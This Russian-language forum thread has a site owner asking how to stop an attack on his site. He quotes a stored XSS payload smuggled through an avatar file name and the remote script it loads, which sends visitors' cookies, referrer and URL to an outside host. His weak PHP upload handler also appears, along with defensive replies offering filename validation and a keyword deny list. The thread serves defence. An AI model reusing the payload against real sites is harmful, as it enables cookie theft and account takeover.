Как защитить сайт от такого взлома?

Question

[Артем Гартунг]

avatar.png" onload="let div=document.createElement('script');div.type='text/javascript';div.src='https://censored-domain/p/2.txt';document.body.append(div);

Код с подгружаемого файла:

function include_file(filename){
var js = document.createElement('script');
js.setAttribute('type', 'text/javascript');
js.setAttribute('src', filename);
js.setAttribute('defer', 'defer');
document.getElementsByTagName('HEAD')[0].appendChild(js);
var cur_file = {};
cur_file[window.location.href] = 1;
if (!window.php_js) window.php_js = {};
if (!window.php_js.includes) window.php_js.includes = cur_file;
if (!window.php_js.includes[filename]) {
window.php_js.includes[filename] = 1;
} else {
window.php_js.includes[filename]++;
}
return window.php_js.includes[filename];
}
var svurl = "https://censored-domain/p/?cookie=" + encodeURIComponent(document.cookie) + '&ref=' + encodeURIComponent(document.referrer) + '&path=' + encodeURIComponent(location.href);
include_file(svurl);

Comments

[Артем Гартунг]

Делает вот такую пакость

[Vladislav Orlov]

Если не сложно, пожалуйста расскажите что этот скрипт делает?
Ведь исполняется скрипт на клиенте, а не сервере. Где подвох?

Answer 1

[xmoonlight]

1. Имя загружаемого файла (и любые пользовательские текстовые данные) - проверять СТРОГО ТОЛЬКО ЧЕРЕЗ REGEX!

2. Проверять тело аватарки сразу после загрузки (пока файл во временной папке) на соответствие формату изображения. Например, запросив разрешение изображения или любое другое свойство, проверить заголовок.

3. Проверить валидность на минимальный и максимальный размер файла изображения.

4. И, заодно, бонусом, можно проверить тело файла на содержание любого из слов: script,document, window, onload, onerror, function, body,query, select,update, insert.

БОНУС: сигнатуры

Comments

[xmoonlight]

CyclusVitalis, да, точно!)) не заметил - исправлюсь ))

[xmoonlight]

CyclusVitalis, готово!)

[Артем Гартунг]

Так, ну смотрите вот полный код загрузки изображения:

// Директория, куда будут загружаться файлы.
$path = $_SERVER["DOCUMENT_ROOT"] . '/core/img/user/';
 
if (!empty($file)) {
	// Проверим на ошибки загрузки.
	if (!empty($file['error']) || empty($file['tmp_name'])) {
		switch (@$file['error']) {
			case 1:
			case 2: $error = 'Превышен размер загружаемого файла.'; break;
			case 3: $error = 'Файл был получен только частично.'; break;
			case 4: $error = 'Файл не был загружен.'; break;
			case 6: $error = 'Файл не загружен - отсутствует временная директория.'; break;
			case 7: $error = 'Не удалось записать файл на диск.'; break;
			case 8: $error = 'PHP-расширение остановило загрузку файла.'; break;
			case 9: $error = 'Файл не был загружен - директория не существует.'; break;
			case 10: $error = 'Превышен максимально допустимый размер файла.'; break;
			case 11: $error = 'Данный тип файла запрещен.'; break;
			case 12: $error = 'Ошибка при копировании файла.'; break;
			default: $error = 'Файл не был загружен - неизвестная ошибка.'; break;
		}
	} elseif ($file['tmp_name'] == 'none' || !is_uploaded_file($file['tmp_name'])) {
		$error = 'Не удалось загрузить файл.';
	} else {
		// Оставляем в имени файла только буквы, цифры и некоторые символы.
		$pattern = "[^a-zа-яё0-9,~!@#%^-_\$\?\(\)\{\}\[\]\.]";
		$name = mb_eregi_replace($pattern, '-', $file['name']);
		$name = mb_ereg_replace('[-]+', '-', $name);
 
		$parts = pathinfo($name);
		if (empty($name) || empty($parts['extension'])) {$error = 'Не удалось загрузить файл.';} 
		elseif (!empty($allow) && !in_array(strtolower($parts['extension']), $allow)){$error = 'Недопустимый тип файла';}
		else {
			$names = explode(".", $name);
			$name_image = $names[0] = time();
			// Перемещаем файл в директорию.
			if (move_uploaded_file($file['tmp_name'], $path . md5($name_image).'.'.$names[1])) {
				$success = 'Файл '.$name.' успешно загружен.';
			} else {$error = 'Не удалось загрузить файл.';}
		}
	}
 
	// Выводим сообщение о результате загрузки.
	if (!empty($success)) {echo $success;}
	else {echo $error;}
}

[Артем Гартунг]

Загрузка фото для меня просто очень слабое место(

[Артем Гартунг]

а да, так же первое фото загруженное хакером не являлось фотографией, просто 01.png, далее у него сменилось несколько фото, одно из них стало моей аватаркой

[Артем Гартунг]

после этого я дополнил этот код что бы он менял название у загружаемой картинки на новое

[xmoonlight]

Артем Гартунг, $file['tmp_name']) - это надо проверить, что содержит только латинские символы, цифры, знаки: -_ и одну точку с нужными расширениями.

[Артем Гартунг]

xmoonlight, Проверить валидность на минимальный и максимальный размер файла изображения

Если я не ошибаюсь то проверять нужно это тут $file['size']

[Артем Гартунг]

xmoonlight, и 2-й , 4-й пункт как правильно осуществить?

[xmoonlight]

Артем Гартунг,если не знаете - фриланс в помощь!

[CityCat4]

и одну точку с нужными расширениями.

Точек может быть несколько :) Например - eto.foto.sisek.png

[xmoonlight]

CityCat4, ничего не поделаешь: пусть делают нормальное "имя_файла.расширение". :)